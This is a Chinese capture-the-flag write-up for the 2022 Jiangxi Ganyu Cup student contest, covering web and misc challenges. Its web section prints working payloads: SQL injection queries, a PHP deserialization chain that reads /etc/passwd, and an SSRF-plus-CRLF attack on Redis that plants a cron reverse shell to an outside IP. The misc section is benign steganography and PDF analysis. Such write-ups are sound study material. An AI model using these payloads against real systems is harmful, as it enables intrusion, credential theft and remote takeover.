2022年江西省赣育杯网络安全大赛学生组WebMisc Writeup
创始人
2024-01-07 00:31:40

文章目录

  • WEB
    • 签到
    • easyzphp
    • ezpy
  • MISC
    • byteMuisc
    • 有趣的PDF

WEB

签到

?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5--+?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='SQL01'),3,4,5--+?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3,4,5--+?id=-1'union select 1,(select flag from SQL01.users),3,4,5--+

在这里插入图片描述

easyzphp

exit("no way!");
}
if (isset($_GET['source']))
{$path = basename($_SERVER['PHP_SELF']);if (!preg_match('/pop.php$/', $path) && !preg_match('/index.php$/', $path)){exit("nonono!");}highlight_file($path);exit();
}
?>
Source
  • $_SERVER['PHP_SELF']:https://www.php.net/manual/zh/reserved.variables.server.php
  • basename():https://www.php.net/manual/zh/function.basename.php

造成这里的绕过主要是因为basename()Linux下,如果取得的文件名开头是非ASCII码范围的字符,则basename()会抛弃这个文件名,继续往上一层走,把上一层的文件名取出来,直到获取到正常可显示ASCII字符开头的文件名(Windows下直接获取)。

在这里插入图片描述
payload:/index.php/pop.php/%80?source

读取到pop.php的源码

public $f;public $hint;public function __invoke(){if (filter_var($this->hint, FILTER_VALIDATE_URL)) {$r = parse_url($this->hint);if (!empty($this->f)) {if (strpos($this->f, "try") !==  false && strpos($this->f, "pass") !== false) {@include($this->f . '.php');//something in hint.php} else {die("try again!");}if (preg_match('/prankhub$/', $r['host'])) {@$out = file_get_contents($this->hint);echo $out;} else {die("error");}} else {die("try it!");}} else {die("Invalid URL");}}
}class Abandon
{public $test;public $pop;public function __construct(){$this->test = "";$this->pop = "";}public function __toString(){return $this->pop['object']->test;}public function __wakeup(){if (preg_match("/flag/i", $this->test)) {echo "hacker";$this->test = "index.php";}}
}class Route
{public $point;public function __construct(){$this->point = array();}public function __get($key){$function = $this->point;return $function();}
}if (isset($_POST['object'])) {unserialize($_POST['object']);
}

$this->hint只需要是一个有效的URL,且parse_url($this->hint)['host']==/prankhub$/

PS C:\Users\Administrator\Downloads> php -r "var_dump(parse_url(filter_var('mochu7://prankhub/', FILTER_VALIDATE_URL))['host']);"
Command line code:1:
string(8) "prankhub"

Abandon::__construct() -> Abandon::__wakeup() -> Abandon::__toString() -> Route::__get() -> SSRF::__invoke()

poc

public $f;public $hint;
}class Abandon
{public $test;public $pop;
}class Route
{public $point;
}$abandon = new Abandon();
$abandon->test = new Abandon();
$route = new Route();
$route->point = new SSRF();
$route->point->f = 'trypass';
$route->point->hint = 'mochu7://prankhub/../../../../../../../etc/passwd';
$abandon->test->pop = array("object" => $route);echo serialize($abandon);

object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:49:"mochu7://prankhub/../../../../../../../etc/passwd";}}}}s:3:"pop";N;}

在这里插入图片描述
hint.php

object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:60:"mochu7://prankhub/../../../../../../../var/www/html/hint.php";}}}}s:3:"pop";N;}

在这里插入图片描述
读flag

object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:57:"mochu7://prankhub/../../../../../../../f1111444449999.txt";}}}}s:3:"pop";N;}

在这里插入图片描述

ezpy

扫出一个/source

在这里插入图片描述
得到源码

#!python
#!/usr/bin/env python3
import os
import urllib
import urllib.request
import urllib.error
import redis as redis
from flask import Flask, request, render_templateapp = Flask(__name__)
redis_conn = redis.Redis(host='127.0.0.1', port=6379, password=os.getenv("P"), db=0)@app.route("/getinfo")
def getinfo():sitename = request.args.get("sitename")sitename = redis_conn.get(sitename).decode()if not sitename.startswith(('http','file')):return "错误:不支持协议"try:return urllib.request.urlopen(sitename).read()except Exception as e:return "错误:  " + str(e)@app.route("/setinfo",methods=['POST'])
def setinfo():username = request.form.get("sitename")siteurl =  request.form.get("siteurl")if redis_conn.set(username,siteurl):return "ok"return "!!!"@app.route("/")
def index():return render_template("index.html")@app.route("/sitelist")
def sitelist():return render_template("sitelist.html",sitelist=redis_conn.keys())@app.route("/source")
def source():return open("/app/app.py","r").read()if __name__ == '__main__':app.run(host='0.0.0.0', port=80,debug=False)

有本地的Redis,并且给出了密码是环境变量P的值,且siteurl利用file协议可任意文件读取

http://192.168.38.220:8044/setinfositename=env&siteurl=file:///proc/self/environ

在这里插入图片描述
拿到Redis的认证密码,就可以做有密码认证的的Redis攻击

在这里插入图片描述

注意到这里使用的是Python 3.7,且使用了urllib模块,而Python 3.x-3.7.2版本中的urllib存在CRLF攻击
https://www.anquanke.com/post/id/240014#h2-8

那么这里就可以利用CRLF做有密码认证的Redis攻击,创建计划任务反弹Shell
https://www.modb.pro/db/65827

http://127.0.0.1:6379/ HTTP/1.1
auth 1bcc23dfc231aac
$8
flushall
*3
$3
set
$1
1
$66*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
savemochu7:

修改为自己的VPS注意Bulk Strings表示的长度,并且要注意闭合原来的HTTP请求。

from urllib.parse import *payload = 'http://127.0.0.1:6379/ HTTP/1.1\r\nauth 1bcc23dfc231aac\r\n$8\r\nflushall\r\n*3\r\n$3\r\nset\r\n$1\r\n1\r\n$66\r\n\r\n\r\n*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"\r\n\r\n\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$16\r\n/var/spool/cron/\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$4\r\nroot\r\n*1\r\n$4\r\nsave\r\n\r\nmochu7:'
print(quote(payload))

利用Burp给/setinfo传入sitenamesiteurl

在这里插入图片描述

然后等待反弹shell即可

在这里插入图片描述

MISC

byteMuisc

这题运气好抢了个一血

在这里插入图片描述

beep.png末尾发现密码

在这里插入图片描述

LSB提取数据

在这里插入图片描述

a=64E3,80*(128

在这里插入图片描述

https://www.reddit.com/r/bytebeat/comments/s0b0m0/i_made_the_coolest_music/

https://dollchan.net/bytebeat/index.html

在这里插入图片描述

很明显的瑞克摇

PS C:\Users\Administrator> php -r "echo md5('never_gonna_give_you_up');"
daa2c770480cf44a285cd9225de2d522

SangFor{daa2c770480cf44a285cd9225de2d522}

有趣的PDF

在这里插入图片描述

hint:
有趣的PDF 1、PDF结构: launchURL 2、js in PDF 3、2021在野漏洞的出题灵感

art.pdf中嵌套了一个pdf,有密码

在这里插入图片描述
foremost分离出一张图片

在这里插入图片描述

得到信息:part2: unicode

在这里插入图片描述

PDFStreamDumper发现第一部分密码:password:baseURL_

在这里插入图片描述

得到where.pdf的密码:baseURL_unicode

在这里插入图片描述

where.pdf的JS注释区有一段貌似加密的数据?

在这里插入图片描述

之后就不会了,hint提示说是2021在野漏洞,找了半天没啥进展

如果哪位师傅解了这题希望能一起交流下这题,我的联系方式:UVE6IDIzOTI1MTczNTk= 谢谢^_^

上一篇:有趣的KaTeX(附源码)

下一篇:Web 1.0、Web 2.0 和 Web 3.0 之间的比较

相关内容

热门资讯

苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
阿西吧是什么意思 阿西吧相当于... 即使你没有受到过任何外语培训,你也懂四国语言。汉语:你好英语:Shit韩语:阿西吧(아,씨발! )日...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
世界上最漂亮的人 世界上最漂亮... 此前在某网上,选出了全球265万颜值姣好的女性。从这些数量庞大的女性群体中,人们投票选出了心目中最美...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
我喜欢你韩语怎么说 sikid...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
我喜欢你韩语怎么说 sikid...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
阿西吧是什么意思 阿西吧相当于... 即使你没有受到过任何外语培训,你也懂四国语言。汉语:你好英语:Shit韩语:阿西吧(아,씨발! )日...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...